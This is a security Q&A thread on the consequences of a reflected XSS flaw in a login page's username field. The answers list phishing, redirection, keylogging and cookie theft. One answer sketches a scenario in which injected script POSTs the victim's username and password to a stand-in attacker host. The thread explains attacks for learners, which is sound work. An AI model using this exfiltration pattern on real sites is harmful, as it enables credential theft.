# What can the effects of reflected XSS on the login page be?

Tags: web-application, xss

Im a beginner in WASA. What are the probable ill effects of having a reflected XSS vulnerability on the login page? Lets say reflected XSS is identified in the username parameter on the login page.

Comment: Sounds a bit like a homework question, as it's currently phrased, but consider what could happen if you used `window.location=` in the payload

Comment: When you say that the username parameter on the login page, do you mean the page that has the login form? Or do you mean the page that handles the login form after it is submitted?

Comment: On another note, this is an indication for an attacker that all he needs a little bit of time to find XSS on at least a few pages after authentication. "Easy to hack" will be the perception.

Answer (score 2):

Injecting code in a page can lead to a lot many things. Few of those are:

1. Lead to Phishing attacks
2. Redirection
3. A keylogger can be created
4. XSRF
5. Get data from JS variables and non-HTTPonly cookies

Comment: Also, in the most rare and extreme, yet very realistic cases, machine compromise via sophisticated browser exploits

Answer (score 1):

1. Chuck sends their victim(s) a link to the target site (`example.com`, containing an XSS payload in the query string).
2. Bob clicks the link.
3. Bob checks the address bar to make sure it is `https` protocol, padlock, and has the expected domain.
4. As the address bar shows `https://example.com`, Bob proceeds to login.
5. Upon click of the <kbd>Login</kbd> button, Chuck's payload runs and sends Bob's username and password to Chuck's website using an AJAX request:

   - `POST https://chuck.example.org/get_creds`
   - `username=bob&password=baseball`